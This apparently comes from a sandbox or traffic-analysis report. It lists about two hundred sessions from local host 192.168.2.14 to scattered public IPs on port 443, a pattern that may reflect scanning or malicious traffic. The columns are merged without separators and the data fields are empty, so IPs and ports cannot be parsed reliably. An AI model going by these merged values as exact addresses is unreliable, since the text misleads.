                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14581192.168.2.1446740115.172.58.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14582192.168.2.1440552137.239.21.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14583192.168.2.1442592145.249.91.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14584192.168.2.1454564213.227.214.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14585192.168.2.143397217.106.227.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14586192.168.2.1460096197.160.167.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14587192.168.2.144107461.104.155.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14588192.168.2.1454918219.147.102.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14589192.168.2.143425047.125.229.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14590192.168.2.1447316208.59.185.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14591192.168.2.143382248.178.38.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14592192.168.2.1437922112.103.106.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14593192.168.2.145734694.101.236.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14594192.168.2.1443614119.76.80.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14595192.168.2.1447066175.111.134.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14596192.168.2.144897653.221.230.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14597192.168.2.145058638.198.165.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14598192.168.2.1453324151.215.92.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14599192.168.2.144297417.183.139.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14600192.168.2.143711279.152.94.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14601192.168.2.1447184111.255.243.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14602192.168.2.1438236164.184.146.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14603192.168.2.144801648.161.212.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14604192.168.2.1459096197.224.208.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14605192.168.2.1448034121.241.150.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14606192.168.2.145749289.244.66.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14607192.168.2.144444867.17.213.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14608192.168.2.145142290.39.138.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14609192.168.2.144358680.98.234.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14610192.168.2.1449450183.126.179.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14611192.168.2.1446868106.134.106.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14612192.168.2.145174473.28.118.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14613192.168.2.1455388142.131.198.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14614192.168.2.1438750107.227.143.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14615192.168.2.145925847.73.5.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14616192.168.2.1453526171.202.249.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14617192.168.2.145086264.66.143.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14618192.168.2.145466874.217.115.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14619192.168.2.1446290222.166.234.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14620192.168.2.1445382135.52.120.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14621192.168.2.144720280.61.84.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14622192.168.2.1433352137.92.47.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14623192.168.2.1455844197.32.160.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14624192.168.2.1447486212.77.47.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14625192.168.2.144528652.236.100.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14626192.168.2.1441232166.28.158.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14627192.168.2.144020281.176.88.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14628192.168.2.144619470.237.200.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14629192.168.2.145941847.175.172.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14630192.168.2.143897648.165.64.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14631192.168.2.1433240191.130.137.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14632192.168.2.1459962113.234.10.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14633192.168.2.1436002222.195.174.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14634192.168.2.145022686.217.245.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14635192.168.2.145140477.224.203.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14636192.168.2.144769689.233.32.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14637192.168.2.144250619.171.12.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14638192.168.2.1457588136.125.0.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14639192.168.2.145980687.8.220.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14640192.168.2.145144688.207.19.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14641192.168.2.1453494139.218.109.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14642192.168.2.144418288.212.40.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14643192.168.2.144270613.133.250.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14644192.168.2.1440228165.193.135.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14645192.168.2.1433956216.82.142.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14646192.168.2.143820018.192.5.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14647192.168.2.145958224.38.136.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14648192.168.2.1434404209.156.166.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14649192.168.2.1445244115.173.198.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14650192.168.2.1442630114.1.231.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14651192.168.2.1436570210.227.191.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14652192.168.2.1432848106.178.225.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14653192.168.2.144793627.83.149.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14654192.168.2.1455466175.0.134.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14655192.168.2.1445514186.181.170.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14656192.168.2.1444540194.225.159.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14657192.168.2.14520982.9.90.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14658192.168.2.1434720136.107.196.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14659192.168.2.1438172144.133.62.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14660192.168.2.1449094195.15.201.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14661192.168.2.144182260.103.19.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14662192.168.2.1438088144.48.215.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14663192.168.2.1436252186.175.1.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14664192.168.2.1435754100.239.197.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14665192.168.2.1451310154.210.11.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14666192.168.2.14368149.130.229.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14667192.168.2.145108861.109.180.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14668192.168.2.1445412194.76.152.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14669192.168.2.145097859.211.48.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14670192.168.2.1436544108.243.52.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14671192.168.2.1455244156.32.18.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14672192.168.2.1448580193.51.42.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14673192.168.2.1435434168.224.118.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14674192.168.2.145917485.151.21.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14675192.168.2.1438772126.206.193.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14676192.168.2.1454530205.38.182.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14677192.168.2.1452686115.234.8.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14678192.168.2.144222681.248.169.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14679192.168.2.1443980141.201.198.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14680192.168.2.144564631.68.118.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14681192.168.2.145916678.241.170.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14682192.168.2.1436552119.129.217.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14683192.168.2.1436856181.62.3.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14684192.168.2.144163885.209.218.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14685192.168.2.145976625.54.234.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14686192.168.2.1459570175.68.50.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14687192.168.2.144309244.248.171.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14688192.168.2.1459390176.53.187.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14689192.168.2.143378283.83.10.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14690192.168.2.1458850101.81.246.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14691192.168.2.1437898178.249.178.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14692192.168.2.1458222142.43.147.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14693192.168.2.143473624.161.21.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14694192.168.2.145049241.99.251.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14695192.168.2.1434422126.155.54.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14696192.168.2.1437968213.226.151.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14697192.168.2.1448500216.120.183.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14698192.168.2.1435688187.151.180.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14699192.168.2.1460876126.51.198.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14700192.168.2.1450992181.131.52.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14701192.168.2.1459028193.126.190.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14702192.168.2.145649247.244.193.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14703192.168.2.1460180130.209.40.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14704192.168.2.1455050175.117.162.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14705192.168.2.1459074165.240.79.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14706192.168.2.1454430195.165.30.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14707192.168.2.1433028209.200.52.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14708192.168.2.1459150102.224.184.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14709192.168.2.1433930141.85.224.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14710192.168.2.145419838.90.135.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14711192.168.2.1443816221.93.37.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14712192.168.2.144114879.206.223.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14713192.168.2.1435862196.93.26.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14714192.168.2.144363883.160.171.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14715192.168.2.1450970143.190.126.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14716192.168.2.1441868137.179.110.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14717192.168.2.1454178176.11.17.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14718192.168.2.1458648169.202.23.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14719192.168.2.1434248170.133.188.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14720192.168.2.1451228144.111.175.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14721192.168.2.144925634.187.123.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14722192.168.2.1445438106.148.239.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14723192.168.2.1439174115.50.228.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14724192.168.2.1448750138.175.229.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14725192.168.2.1451872196.144.155.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14726192.168.2.1437312195.219.145.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14727192.168.2.145927066.139.213.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14728192.168.2.144129283.49.16.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14729192.168.2.143954661.87.221.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14730192.168.2.144033253.106.150.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14731192.168.2.145093247.142.112.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14732192.168.2.1446558149.102.251.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14733192.168.2.1459514208.78.254.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14734192.168.2.145718878.240.226.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14735192.168.2.1459086194.51.99.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14736192.168.2.145543641.130.65.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14737192.168.2.1441804155.211.111.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14738192.168.2.145577446.216.84.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14739192.168.2.1441336177.85.15.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14740192.168.2.1453304139.162.109.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14741192.168.2.14566664.27.42.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14742192.168.2.1440516134.225.208.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14743192.168.2.143384237.102.97.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14744192.168.2.144316819.135.140.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14745192.168.2.1448704220.130.251.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14746192.168.2.1454390175.234.201.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14747192.168.2.1436404117.98.114.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14748192.168.2.1443056192.73.170.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14749192.168.2.1437192209.50.199.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14750192.168.2.145975454.31.78.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14751192.168.2.144882093.51.250.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14752192.168.2.1450288188.233.101.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14753192.168.2.1437772188.187.67.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14754192.168.2.1434388172.121.160.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14755192.168.2.145019698.150.112.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14756192.168.2.145257841.238.114.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14757192.168.2.144614882.209.234.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14758192.168.2.1444490112.253.105.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14759192.168.2.145517827.229.120.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14760192.168.2.14442802.182.50.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14761192.168.2.144199418.21.175.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14762192.168.2.144741439.213.29.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14763192.168.2.1444236221.9.53.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14764192.168.2.145080464.252.158.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14765192.168.2.1434642197.63.211.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14766192.168.2.143870697.159.249.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14767192.168.2.1435036222.141.242.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14768192.168.2.145446664.246.200.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14769192.168.2.144844674.122.111.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14770192.168.2.143566679.97.16.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14771192.168.2.1456082139.179.210.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14772192.168.2.1433092171.97.140.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14773192.168.2.144311281.140.99.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14774192.168.2.144171240.157.160.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14775192.168.2.144265467.214.126.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14776192.168.2.1457190168.68.90.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14777192.168.2.143858217.179.64.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14778192.168.2.1450654212.99.94.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14779192.168.2.144337275.219.6.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14780192.168.2.1436808155.21.215.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14781192.168.2.1452106121.167.192.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14782192.168.2.1454760205.242.105.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14783192.168.2.1453198203.34.86.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14784192.168.2.1435852141.102.194.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14785192.168.2.1453902164.14.126.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14786192.168.2.1449908221.215.7.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14787192.168.2.1445782100.38.83.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14788192.168.2.146065699.142.128.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14789192.168.2.1450014101.236.67.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14790192.168.2.1447076119.95.183.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14791192.168.2.14422809.25.75.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14792192.168.2.1449670156.215.1.193443
                                                        TimestampBytes transferredDirectionData


